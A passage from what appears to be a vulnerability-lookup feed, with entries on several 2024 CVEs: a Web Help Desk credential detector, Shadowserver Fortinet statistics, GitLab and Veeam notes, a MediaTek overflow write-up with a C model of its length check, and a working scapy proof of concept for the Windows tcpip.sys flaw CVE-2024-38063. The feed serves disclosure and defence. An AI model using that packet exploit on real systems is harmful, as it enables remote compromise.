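    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def classify_request(raw: bytes) -> str:
    """'hardcoded-credential' if the PoC account is presented on any path,
    'rest-api-auth' / 'rest-api-noauth' for other requests to the WHD REST path,
    'other' for everything else."""
    _method, path, headers = parse_request(raw)
    creds = decode_basic_auth(headers.get("authorization", ""))
    if creds is not None:
        user, password = creds
        # constant-time comparison so the detector itself does not leak via timing
        if (hmac.compare_digest(user.encode(), HARDCODED_USER.encode())
                and hmac.compare_digest(password.encode(), HARDCODED_PASS.encode())):
            return "hardcoded-credential"
    if path.startswith(WHD_REST_PREFIX):
        return "rest-api-auth" if creds else "rest-api-noauth"
    return "other"


def scan_requests(requests: List[bytes]) -> List[Tuple[int, str]]:
    """Return (index, verdict) for every request whose verdict is not 'other'."""
    return [(i, v) for i, r in enumerate(requests) if (v := classify_request(r)) != "other"]


# Constructed sample traffic (not real captures).
SAMPLE_REQUESTS: List[bytes] = [
    # what the PoC above sends
    (b"GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1\r\n"
     b"Host: whd.example.internal\r\n"
     b"Authorization: " + basic_header(HARDCODED_USER, HARDCODED_PASS).encode() + b"\r\n"
     b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"),
    # a legitimate integration account on the same REST API
    (b"GET /helpdesk/WebObjects/Helpdesk.woa/ra/Tickets HTTP/1.1\r\n"
     b"Host: whd.example.internal\r\n"
     b"Authorization: " + basic_header("orion-svc", "correct horse").encode() + b"\r\n\r\n"),
    # unauthenticated probe of the REST path
    b"GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1\r\n"
    b"Host: whd.example.internal\r\n\r\n",
    # ordinary UI traffic
    b"GET /helpdesk/WebObjects/Helpdesk.woa HTTP/1.1\r\nHost: whd.example.internal\r\n\r\n",
]

if __name__ == "__main__":
    for index, verdict in scan_requests(SAMPLE_REQUESTS):
        print(f"request {index}: {verdict}")
```

Feed it request heads from a reverse proxy or packet capture in front of Web Help Desk; a single hardcoded-credential verdict on a host that is not yet on 12.8.3 HF2 is a strong indicator of exploitation rather than a scan.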

The Shadowserver Foundation - Statistics on cve-2024-23113
6 months ago by Alexandre Dulaunoy

We are now reporting in our feeds Fortinet IPs still likely vulnerable to CVE-2024-23113 (format string pre-auth RCE). This vulnerability is known to be exploited in the wild. 

87,390 IPs found on 2024-10-12. Top: US (14K), Japan (5.1K), India (4.8K)

Ref Original post: https://www.linkedin.com/posts/the-shadowserver-foundation_cybersecurity-vulnerabilitymanagement-vulnerabilities-activity-7251247220493086722-IlIx?utm_source=share&utm_medium=member_desktop

Ref Shadowserver - map: https://dashboard.shadowserver.org/statistics/combined/map/?map_type=std&day=2024-10-12&source=http_vulnerable&source=http_vulnerable6&tag=cve-2024-23113%2B&geo=all&data_set=count&scale=log
Ref Statistics of the available vulnerable devices: https://dashboard.shadowserver.org/statistics/combined/time-series/?date_range=other&d1=2024-10-09&d2=2024-10-12&source=http_vulnerable&source=http_vulnerable6&tag=cve-2024-23113%2B&dataset=unique_ips&style=stacked


{
   uuid: "a1cef39c-8b09-4347-95bb-f4ffedfafccf",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "The Shadowserver Foundation - Statistics",
   description: "~~~\nWe are now reporting in our feeds Fortinet IPs still likely vulnerable to CVE-2024-23113 (format string pre-auth RCE). This vulnerability is known to be exploited in the wild. \n\n87,390 IPs found on 2024-10-12. Top: US (14K), Japan (5.1K), India (4.8K)\n~~~\n\nRef [Original post](https://www.linkedin.com/posts/the-shadowserver-foundation_cybersecurity-vulnerabilitymanagement-vulnerabilities-activity-7251247220493086722-IlIx?utm_source=share&utm_medium=member_desktop)\n\nRef [Shadowserver - map](https://dashboard.shadowserver.org/statistics/combined/map/?map_type=std&day=2024-10-12&source=http_vulnerable&source=http_vulnerable6&tag=cve-2024-23113%2B&geo=all&data_set=count&scale=log)\nRef [Statistics of the available vulnerable devices](https://dashboard.shadowserver.org/statistics/combined/time-series/?date_range=other&d1=2024-10-09&d2=2024-10-12&source=http_vulnerable&source=http_vulnerable6&tag=cve-2024-23113%2B&dataset=unique_ips&style=stacked)",
   description_format: "markdown",
   vulnerability: "CVE-2024-23113",
   creation_timestamp: "2024-10-13T15:21:32.545076+00:00",
   timestamp: "2024-10-13T15:21:32.545076+00:00",
   related_vulnerabilities: [
      "CVE-2024-23113",
   ],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=industrialised",
         ],
      },
   ],
}

cve-2024-23113

Possible commit of the patch on cve-2024-9164
6 months ago by Luciano

From a quick analysis comparing the previous tag and the information found in the changelog:

[Do not create a pipeline on MR refresh if source branch was deleted](https://gitlab.com/gitlab-org/security/gitlab/-/commit/3dd89a71b436e8218a5d159a1dd75cb2de078129) ([merge request](https://gitlab.com/gitlab-org/security/gitlab/-/merge_requests/4524))

the fix of this vuln seems to be: https://gitlab.com/gitlab-org/gitlab/-/commit/480d0bd7ccdca6f93ff715abcd6c2fa7a9bebec2


{
   uuid: "62ceedbe-65b3-4d7b-ab79-6c0240b18d71",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Possible commit of the patch",
   description: "From a quick analysis comparing the previous tag and the information found in the the changelog:\n\n`[Do not create a pipeline on MR refresh if source branch was deleted](https://gitlab.com/gitlab-org/security/gitlab/-/commit/3dd89a71b436e8218a5d159a1dd75cb2de078129) ([merge request](https://gitlab.com/gitlab-org/security/gitlab/-/merge_requests/4524))`\n\nthe fix of this vuln seems to be: \nhttps://gitlab.com/gitlab-org/gitlab/-/commit/480d0bd7ccdca6f93ff715abcd6c2fa7a9bebec2",
   description_format: "markdown",
   vulnerability: "cve-2024-9164",
   creation_timestamp: "2024-10-11T12:46:07.597963+00:00",
   timestamp: "2024-10-11T12:46:48.032889+00:00",
   related_vulnerabilities: [],
}

cve-2024-9164

More details from the vendor on cve-2024-9164
6 months ago by Alexandre Dulaunoy

Run pipelines on arbitrary branches

An issue was discovered in GitLab EE affecting all versions starting from 12.5 prior to 17.2.9, starting from 17.3, prior to 17.3.5, and starting from 17.4 prior to 17.4.2, which allows running pipelines on arbitrary branches. This is a critical severity issue (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N, 9.6). It is now mitigated in the latest release and is assigned CVE-2024-9164.


{
   uuid: "af885327-bc8d-4e07-9ea5-a86cda87beb0",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "More details from the vendor",
   description: "-  GitLab Critical Patch Release: 17.4.2, 17.3.5, 17.2.9  - [https://about.gitlab.com/releases/2024/10/09/patch-release-gitlab-17-4-2-released/](https://about.gitlab.com/releases/2024/10/09/patch-release-gitlab-17-4-2-released/)\n\nRun pipelines on arbitrary branches\n\nAn issue was discovered in GitLab EE affecting all versions starting from 12.5 prior to 17.2.9, starting from 17.3, prior to 17.3.5, and starting from 17.4 prior to 17.4.2, which allows running pipelines on arbitrary branches. This is a critical severity issue (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N, 9.6). It is now mitigated in the latest release and is assigned CVE-2024-9164.",
   description_format: "markdown",
   vulnerability: "cve-2024-9164",
   creation_timestamp: "2024-10-11T12:22:18.480655+00:00",
   timestamp: "2024-10-11T12:22:18.480655+00:00",
   related_vulnerabilities: [
      "CVE-2024-9164",
   ],
   meta: [
      {
         tags: [
            "vulnerability:information=remediation",
         ],
      },
   ],
}

cve-2024-9164

Critical Exploit in MediaTek Wi-Fi Chipsets: Zero-Click Vulnerability (CVE-2024-20017) Threatens Routers and Smartphones on cve-2024-20017
6 months ago by Alexandre Dulaunoy

Critical Exploit in MediaTek Wi-Fi Chipsets: Zero-Click Vulnerability (CVE-2024-20017) Threatens Routers and Smartphones

By Security News from https://blog.sonicwall.com/en-us/2024/09/critical-exploit-in-mediatek-wi-fi-chipsets-zero-click-vulnerability-cve-2024-20017-threatens-routers-and-smartphones/

September 19, 2024

Overview

The SonicWall Capture Labs threat research team became aware of the threat CVE-2024-20017, assessed its impact and developed mitigation measures for the vulnerability. CVE-2024-20017 is a critical zero-click vulnerability with a CVSS 3.0 score of 9.8, impacting MediaTek Wi-Fi chipsets MT7622/MT7915 and RTxxxx SoftAP driver bundles used in products from various manufacturers, including Ubiquiti, Xiaomi and Netgear. The affected versions include MediaTek SDK versions 7.4.0.1 and earlier, as well as OpenWrt 19.07 and 21.02. This translates to a large variety of vulnerable devices, including routers and smartphones. The flaw allows remote code execution without user interaction due to an out-of-bounds write issue. MediaTek has released patches to mitigate the vulnerability and users should update their devices immediately. While this vulnerability was published and patched back in March, only recently did a public PoC become available making exploitation more likely.

Technical Overview

The vulnerability resides in wappd, a network daemon included in the MediaTek MT7622/MT7915 SDK and RTxxxx SoftAP driver bundle. This service is responsible for configuring and managing wireless interfaces and access points, particularly with Hotspot 2.0 technologies. The architecture of wappd is complex, comprising the network service itself, a set of local services that interact with the device’s wireless interfaces, and communication channels between components via Unix domain sockets. Ultimately, the vulnerability is a buffer overflow as a result of a length value taken directly from attacker-controlled packet data without bounds checking and placed into a memory copy. This buffer overflow creates an out-of-bounds write.

Triggering the Vulnerability

The vulnerability exists in the IAPP_RcvHandlerSSB function where an attacker controlled length value is passed to the IAPP_MEM_MOVE macro as described in hyprdude’s blog and seen in Figure 1.

Figure 1: Vulnerable Code sourced from hyprdude

Prior to the last line which calls IAPP_MEM_MOVE, the only bounds check done is to check that the provided length does not exceed the maximum packet length of 1600 bytes. As the size of the destination struct is only 167 bytes, this results in a stack buffer overflow of up to 1433 bytes. To trigger this vulnerability an attacker must send a packet with the expected structures prepending the attack payload. These structures are referred to as the RT_IAPP_HEADER and the RT_IAPP_SEND_SECURITY_BLOCK within the code. To bypass validation checks the length of the RT_IAPP_HEADER struct needs to be small and the RT_IAPP_HEADER.Command field must be set to 50.

Exploitation

The publicly available exploit code achieves remote code execution by using a global address table overwrite technique via a return-oriented programming (ROP) chain. This method leverages the system() call to execute commands, such as sending a reverse shell back to the attacker. The reverse shell is established using Bash and the existing Netcat tool on the chipset. Figure 2 illustrates how the reverse shell command is crafted and embedded within the payload to enable this exploitation tactic.

Figure 2: Reverse Shell Commands

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

IPS: 20322 MediaTek MT7915 wlan Service OOB Write 1
IPS: 20323 MediaTek MT7915 wlan Service OOB Write 2

Remediation Recommendations

Due to the availability of the exploit code, it is highly recommended that users upgrade to the latest version of the firmware for their


{
   uuid: "4d12529b-de4a-40f8-85fb-a910c49847c3",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Critical Exploit in MediaTek Wi-Fi Chipsets: Zero-Click Vulnerability (CVE-2024-20017) Threatens Routers and Smartphones",
   description: "# Critical Exploit in MediaTek Wi-Fi Chipsets: Zero-Click Vulnerability (CVE-2024-20017) Threatens Routers and Smartphones\n\nBy Security News from https://blog.sonicwall.com/en-us/2024/09/critical-exploit-in-mediatek-wi-fi-chipsets-zero-click-vulnerability-cve-2024-20017-threatens-routers-and-smartphones/\n\nSeptember 19, 2024\n# Overview\n\nThe SonicWall Capture Labs threat research team became aware of the threat CVE-2024-20017, assessed its impact and developed mitigation measures for the vulnerability. CVE-2024-20017 is a critical zero-click vulnerability with a CVSS 3.0 score of 9.8, impacting MediaTek Wi-Fi chipsets MT7622/MT7915 and RTxxxx SoftAP driver bundles used in products from various manufacturers, including Ubiquiti, Xiaomi and Netgear. The affected versions include MediaTek SDK versions 7.4.0.1 and earlier, as well as OpenWrt 19.07 and 21.02. This translates to a large variety of vulnerable devices, including routers and smartphones. The flaw allows remote code execution without user interaction due to an out-of-bounds write issue. MediaTek has released patches to mitigate the vulnerability and users should update their devices immediately. While this vulnerability was published and patched back in March, only recently did a public PoC become available making exploitation more likely.\n\n# Technical Overview\n\nThe vulnerability resides in wappd, a network daemon included in the MediaTek MT7622/MT7915 SDK and RTxxxx SoftAP driver bundle. This service is responsible for configuring and managing wireless interfaces and access points, particularly with Hotspot 2.0 technologies. The architecture of wappd is complex, comprising the network service itself, a set of local services that interact with the device’s wireless interfaces, and communication channels between components via Unix domain sockets.  
Ultimately, the vulnerability is a buffer overflow as a result of a length value taken directly from attacker-controlled packet data without bounds checking and placed into a memory copy.  This buffer overflow creates an out-of-bounds write.\n\n# Triggering the Vulnerability\n\nThe vulnerability exists in the IAPP_RcvHandlerSSB function where an attacker controlled length value is passed to the IAPP_MEM_MOVE macro as described in hyprdude’s blog and seen in Figure 1.\n\n\nFigure 1: Vulnerable Code sourced from hyprdude\n\nPrior to the last line which calls IAPP_MEM_MOVE, the only bounds check done is to check that the provided length does not exceed the maximum packet length of 1600 bytes. As the size of the destination struct is only 167 bytes, this results in a stack buffer overflow of up to 1433 bytes. To trigger this vulnerability an attacker must send a packet with the expected structures prepending the attack payload.  These structures are referred to as the RT_IAPP_HEADER and the RT_IAPP_SEND_SECURITY_BLOCK within the code.  To bypass validation checks the length of the RT_IAPP_HEADER struct needs to be small and the RT_IAPP_HEADER.Command field must be to 50.\n\nExploitation\nThe publicly available exploit code achieves remote code execution by using a global address table overwrite technique via a return-oriented programming (ROP) chain. This method leverages the `system()` call to execute commands, such as sending a reverse shell back to the attacker. The reverse shell is established using Bash and the existing Netcat tool on the chipset. 
Figure 2 illustrates how the reverse shell command is crafted and embedded within the payload to enable this exploitation tactic.\n\n\nFigure 2: Reverse Shell Commands\n\n# SonicWall Protections\nTo ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:\n\nIPS: 20322 MediaTek MT7915 wlan Service OOB Write 1\nIPS: 20323 MediaTek MT7915 wlan Service OOB Write 2\n# Remediation Recommendations\nDue to the availability of the exploit code, it is highly recommended that users upgrade to the latest version of the firmware for their",
   description_format: "markdown",
   vulnerability: "CVE-2024-20017",
   creation_timestamp: "2024-09-21T16:21:27.498950+00:00",
   timestamp: "2024-09-21T16:21:27.498950+00:00",
   related_vulnerabilities: [
      "CVE-2024-20017",
   ],
   meta: [
      {
         url: "https://github.com/mellow-hype/cve-2024-20017/tree/main",
      },
   ],
}

cve-2024-20017
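
The length check described in the write-up above, modelled in C as an added example (this is not code from the SonicWall post, from hyprdude's blog or from the MediaTek SDK). Only the 1600-byte packet limit, the 167-byte destination and Command == 50 come from the write-up; the wire layout assumed here (one Command byte, then a big-endian 16-bit length, then the block) and the names handle_ssb_vulnerable, handle_ssb_fixed and bytes_past_destination are assumptions made for the example. The destination is placed at the start of a byte array so the overflow can be measured instead of corrupting the real stack.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Simplified model of the IAPP_RcvHandlerSSB pattern described above. Only the
 * 1600-byte packet limit, the 167-byte destination and Command == 50 come from
 * the write-up; the wire layout (one Command byte, then a big-endian 16-bit
 * length, then the block) and all names here are assumptions for this example. */
#define IAPP_MAX_PACKET_LEN 1600
#define IAPP_CMD_SSB        50
#define SECURITY_BLOCK_LEN  167
#define HDR_LEN             3
/* Fake stack frame: the destination occupies the first 167 bytes; whatever
 * follows stands in for the saved registers and return address. */
#define FRAME_LEN (SECURITY_BLOCK_LEN + IAPP_MAX_PACKET_LEN)

typedef int (*ssb_handler)(const uint8_t *pkt, size_t pkt_len, uint8_t *dst, size_t dst_len);

/* Shared header parsing: returns the attacker-supplied length, or -1. */
static int parse_ssb_header(const uint8_t *pkt, size_t pkt_len) {
    if (pkt_len < HDR_LEN || pkt[0] != IAPP_CMD_SSB) return -1;
    int len = (pkt[1] << 8) | pkt[2];
    if ((size_t)len > pkt_len - HDR_LEN) return -1;   /* harness safety: never read past the packet */
    return len;
}

/* Vulnerable form: the length is compared with the maximum packet size only,
 * never with the size of the destination it is copied into. */
int handle_ssb_vulnerable(const uint8_t *pkt, size_t pkt_len, uint8_t *dst, size_t dst_len) {
    (void)dst_len;                                   /* the real handler has no such bound */
    int len = parse_ssb_header(pkt, pkt_len);
    if (len < 0 || len > IAPP_MAX_PACKET_LEN) return -1;
    memmove(dst, pkt + HDR_LEN, (size_t)len);        /* up to 1600 - 167 = 1433 bytes past dst */
    return 0;
}

/* Hardened form: the bound is the destination, not the transport. */
int handle_ssb_fixed(const uint8_t *pkt, size_t pkt_len, uint8_t *dst, size_t dst_len) {
    int len = parse_ssb_header(pkt, pkt_len);
    if (len < 0 || (size_t)len > dst_len) return -1;
    memmove(dst, pkt + HDR_LEN, (size_t)len);
    return 0;
}

/* Constructed packet: Command 50, big-endian length, then `len` filler bytes. */
size_t build_ssb_packet(uint8_t *out, uint16_t len) {
    out[0] = IAPP_CMD_SSB;
    out[1] = (uint8_t)(len >> 8);
    out[2] = (uint8_t)(len & 0xFF);
    memset(out + HDR_LEN, 'A', len);
    return HDR_LEN + (size_t)len;
}

/* Feeds one constructed packet to a handler and returns how many filler bytes
 * ended up beyond the 167-byte destination, i.e. the size of the overflow. */
size_t bytes_past_destination(ssb_handler handler, uint16_t len) {
    static uint8_t pkt[HDR_LEN + 0xFFFF];            /* large enough for any 16-bit length */
    uint8_t frame[FRAME_LEN];
    size_t pkt_len = build_ssb_packet(pkt, len);
    size_t spilled = 0;
    memset(frame, 0, sizeof frame);
    handler(pkt, pkt_len, frame, SECURITY_BLOCK_LEN);
    for (size_t i = SECURITY_BLOCK_LEN; i < sizeof frame; i++)
        if (frame[i] == 'A') spilled++;
    return spilled;
}

int main(void) {
    const uint16_t lens[] = {100, 167, 168, 1600, 2000};
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++)
        printf("length %4u: vulnerable handler spills %4zu bytes, fixed handler spills %zu\n",
               (unsigned)lens[i], bytes_past_destination(handle_ssb_vulnerable, lens[i]),
               bytes_past_destination(handle_ssb_fixed, lens[i]));
    return 0;
}
```

Compile with `cc -Wall example.c && ./a.out`. A length of 2000 is rejected by both handlers because it exceeds the packet limit, which is the only check the vulnerable form has; a length of 1600 passes that check and spills 1433 bytes past the destination, while the fixed form rejects anything over 167 because it bounds the copy by the destination size.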

CVE Wednesday - CVE-2024-20439 - from StarkeBlog on cve-2024-20439
6 months ago by Alexandre Dulaunoy

Cisco recently released an advisory for CVE-2024-20439 here. (nvd) Please note I did not discover this vulnerability, I just reverse engineered the vulnerability from the advisory (https://starkeblog.com/cve-wednesday/cisco/2024/09/20/cve-wednesday-cve-2024-20439.html) published by Nicholas Starke https://starkeblog.com/


{
   uuid: "daf228ff-bf18-462b-8d03-acbd9cf60965",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "CVE Wednesday - CVE-2024-20439 - from StarkeBlog",
   description: "[Cisco recently released an advisory for CVE-2024-20439 here. (nvd) Please note I did not discover this vulnerability, I just reverse engineered the vulnerability from the advisory](https://starkeblog.com/cve-wednesday/cisco/2024/09/20/cve-wednesday-cve-2024-20439.html) published by Nicholas Starke https://starkeblog.com/\n\n",
   description_format: "markdown",
   vulnerability: "CVE-2024-20439",
   creation_timestamp: "2024-09-21T07:26:37.729241+00:00",
   timestamp: "2024-09-21T07:26:37.729241+00:00",
   related_vulnerabilities: [
      "CVE-2024-20439",
   ],
   meta: [
      {
         tags: [
            "vulnerability:information=annotation",
         ],
      },
   ],
}

cve-2024-20439

More details about the Veeam vulnerability on cve-2024-42024
7 months ago by Alexandre Dulaunoy

  • https://censys.com/cve-2024-40711/
  • https://labs.watchtowr.com/veeam-backup-response-rce-with-auth-but-mostly-without-auth-cve-2024-40711-2/
Well, that was a complex vulnerability, requiring a lot of code-reading! We’ve successfully shown how multiple bugs can be chained together to gain RCE in a variety of versions of Veeam Backup & Replication.

We’re a little confused by Veeam’s advisory, however, which seems to be contradictory. As you may recall from the very start of the blogpost, Veeam’s advice was that versions up to and including 12.1.2.172 are vulnerable. While the title of the bug states that “A vulnerability allowing unauthenticated remote code execution (RCE)”, suggesting a world-ending CVSS 10 bug, they then proceed to label the bug as a less-serious CVSS 9.8, requiring user authentication before exploitation is possible. This is confusing, because all versions beneath 12.1.2.172 don’t require authentication to exploit, and only a change made in 12.1.2.172 made it so authentication was required (see above analysis).

Perhaps Veeam simply made an error in their advisory, as we (and Code White) clearly demonstrate that authentication is not required. Hopefully, a pre-emptive change wasn’t made in 12.1.2.172 to downgrade the eventual severity of this vulnerability.

Regardless of CVSS, the actual situation, as you can see above, is somewhat more nuanced than ‘RCE before 12.1.2.172':
Version     Status
12.2.0.334     Fully patched. Not affected by the vulnerabilities in this blogpost.
12.1.2.172     Affected, but exploitation requires authentication. Low privilege users are able to execute arbitrary code.
12.1.1.56 and earlier     Vulnerable to unauthenticated RCE.

Speaking of exploitation, we’re breaking with tradition on this bug by not releasing a full exploit chain (sorry, folks!). We’re a little worried by just how valuable this bug is to malware operators, and so are (on this occasion only) refraining from dropping a working exploit. The most we’re going to drop is this tantalizing video of exploitation, which will have to tide you over until our next post:


{
   uuid: "4e36fb63-ef06-4e9d-8f57-7b76aebf7bde",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "More details about the Veeam vulnerability",
   description: "- https://censys.com/cve-2024-40711/\n- https://labs.watchtowr.com/veeam-backup-response-rce-with-auth-but-mostly-without-auth-cve-2024-40711-2/\n\n~~~\nWell, that was a complex vulnerability, requiring a lot of code-reading! We’ve successfully shown how multiple bugs can be chained together to gain RCE in a variety of versions of Veeam Backup & Replication.\n\nWe’re a little confused by Veeam’s advisory, however, which seems to be contradictory. As you may recall from the very start of the blogpost, Veeam’s advice was that versions up to and including 12.1.2.172 are vulnerable. While the title of the bug states that “A vulnerability allowing unauthenticated remote code execution (RCE)“, suggesting a world-ending CVSS 10 bug, they then proceed to label the bug as a less-serious CVSS 9.8, requiring user authentication before exploitation is possible. This is confusing, because all versions beneath 12.1.2.172 don’t require authentication to exploit, and only a change made in 12.1.2.172 made it so authentication was required (see above analysis).\n\nPerhaps Veeam simply made an error in their advisory, as we (and Code White) clearly demonstrate that authentication is not required. Hopefully, a pre-emptive change wasn’t made in 12.1.2.172 to downgrade the eventual severity of this vulnerability.\n\nRegardless of CVSS, the actual situation, as you can see above, is somewhat more nuanced than ‘RCE before 12.1.2.172':\nVersion \tStatus\n12.2.0.334 \tFully patched. Not affected by the vulnerabilities in this blogpost.\n12.1.2.172 \tAffected, but exploitation requires authentication. Low privilege users are able to execute arbitrary code.\n12.1.1.56 and earlier \tVulnerable to unauthenticated RCE.\n\nSpeaking of exploitation, we’re breaking with tradition on this bug by not releasing a full exploit chain (sorry, folks!). 
We’re a little worried by just how valuable this bug is to malware operators, and so are (on this occasion only) refraining from dropping a working exploit. The most we’re going to drop is this tantalizing video of exploitation, which will have to tide you over until our next post:\n~~~",
   description_format: "markdown",
   vulnerability: "cve-2024-42024",
   creation_timestamp: "2024-09-09T20:48:43.060182+00:00",
   timestamp: "2024-09-10T06:14:51.710700+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
         ],
      },
   ],
}

cve-2024-42024

MISP 2.4.197 released with many bugs fixed, a security fix and improvements. on cve-2024-45509
7 months ago by Alexandre Dulaunoy


{
   uuid: "80e30504-7622-448d-a12f-9f2454207c6d",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: " MISP 2.4.197 released with many bugs fixed, a security fix and improvements.",
   description: "- [MISP 2.4.197 released with many bugs fixed, a security fix and improvements.](https://www.misp-project.org/2024/09/02/MISP.2.4.197.released.html/) The MISP release 2.4.197 ",
   description_format: "markdown",
   vulnerability: "cve-2024-45509",
   creation_timestamp: "2024-09-05T12:30:37.480867+00:00",
   timestamp: "2024-09-09T07:00:39.566529+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:information=remediation",
         ],
      },
   ],
}

cve-2024-45509

Proof of Concept for CVE-2024-38063 - Remote Code Execution Vulnerability in tcpip.sys on cve-2024-38063
7 months ago by Cédric Bonhomme

Proof of Concept for CVE-2024-38063 (https://github.com/ynwarcs/CVE-2024-38063), an RCE in tcpip.sys patched on August 13th 2024.

An analysis of the vulnerability (https://malwaretech.com/2024/08/exploiting-CVE-2024-38063.html) published on August 27, 2024 by Marcus Hutchins.

PoC published on GitHub on August 24, 2024.

Implementation

Implementation details are available on GitHub (https://github.com/ynwarcs/CVE-2024-38063/blob/main/script/cve-2024-38063.py).

```python
import time

from scapy.all import *

iface = ''          # outgoing interface, e.g. 'eth0'
ip_addr = ''        # target IPv6 address
mac_addr = ''       # optional target MAC; when set, frames are sent at layer 2 with sendp()
num_tries = 20
num_batches = 20

def get_packets_with_mac(i):
    # Layer-2 variant of get_packets(): the same three IPv6 packets, each wrapped in an Ethernet frame.
    frag_id = 0xdebac1e + i
    first = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])
    second = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m=1, offset=0) / 'aaaaaaaa'
    third = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m=0, offset=1)
    return [first, second, third]

def get_packets(i):
    # One try is three packets sharing flow label 1 and hop limit 64+i:
    #   1. a Destination Options header carrying a PadN-shaped option whose type is 0x81 instead of 1,
    #   2. a first fragment (m=1, offset 0) carrying 8 bytes of payload,
    #   3. a last fragment (m=0, offset 1) with no payload and the same fragment ID.
    if mac_addr != '':
        return get_packets_with_mac(i)
    frag_id = 0xdebac1e + i
    first = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])
    second = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m=1, offset=0) / 'aaaaaaaa'
    third = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m=0, offset=1)
    return [first, second, third]

# Every try is queued twice per batch.
final_ps = []
for _ in range(num_batches):
    for i in range(num_tries):
        final_ps += get_packets(i) + get_packets(i)

print("Sending packets")
if mac_addr != '':
    sendp(final_ps, iface=iface or None)
else:
    send(final_ps, iface=iface or None)

# The PoC expects the corruption to occur about 60 seconds after the packets have been sent.
for i in range(60):
    print(f"Memory corruption will be triggered in {60-i} seconds", end='\r')
    time.sleep(1)
print("")
```


{
   uuid: "4be2fca3-59f3-437e-a4db-7c0b2f8acb81",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Proof of Concept for CVE-2024-38063 - Remote Code Execution Vulnerability in tcpip.sys",
   description: "[Proof of Concept for CVE-2024-38063](https://github.com/ynwarcs/CVE-2024-38063), a RCE in tcpip.sys patched on August 13th 2024.\n\nAn [analysis of the vulnerability](https://malwaretech.com/2024/08/exploiting-CVE-2024-38063.html) published on August 27, 2024 by Marcus Hutchins.\n\nPoC published on GitHub on August 24, 2024.\n\n### Implementation\n\nImplementation details are available on [GitHub](https://github.com/ynwarcs/CVE-2024-38063/blob/main/script/cve-2024-38063.py).\n\n```python\nfrom scapy.all import *\n\niface=''\nip_addr=''\nmac_addr=''\nnum_tries=20\nnum_batches=20\n\ndef get_packets_with_mac(i):\n    frag_id = 0xdebac1e + i\n    first = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])\n    second = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 1, offset = 0) / 'aaaaaaaa'\n    third = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 0, offset = 1)\n    return [first, second, third]\n\ndef get_packets(i):\n    if mac_addr != '':\n        return get_packets_with_mac(i)\n    frag_id = 0xdebac1e + i\n    first = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])\n    second = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 1, offset = 0) / 'aaaaaaaa'\n    third = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 0, offset = 1)\n    return [first, second, third]\n\nfinal_ps = []\nfor _ in range(num_batches):\n    for i in range(num_tries):\n        final_ps += get_packets(i) + get_packets(i)\n\nprint(\"Sending packets\")\nif mac_addr != '':\n    sendp(final_ps, iface)\nelse:\n    send(final_ps, iface)\n\nfor i in range(60):\n    print(f\"Memory corruption will be triggered in {60-i} seconds\", end='\\r')\n    time.sleep(1)\nprint(\"\")\n```",
   description_format: "markdown",
   vulnerability: "CVE-2024-38063",
   creation_timestamp: "2024-08-28T08:55:21.234923+00:00",
   timestamp: "2024-08-30T12:36:21.633241+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
            "vulnerability:information=PoC",
         ],
      },
   ],
}

cve-2024-38063

Analysis of a Windows IPv6 Fragmentation Vulnerability: CVE-2021-24086 on cve-2021-24086
7 months ago by Cédric Bonhomme

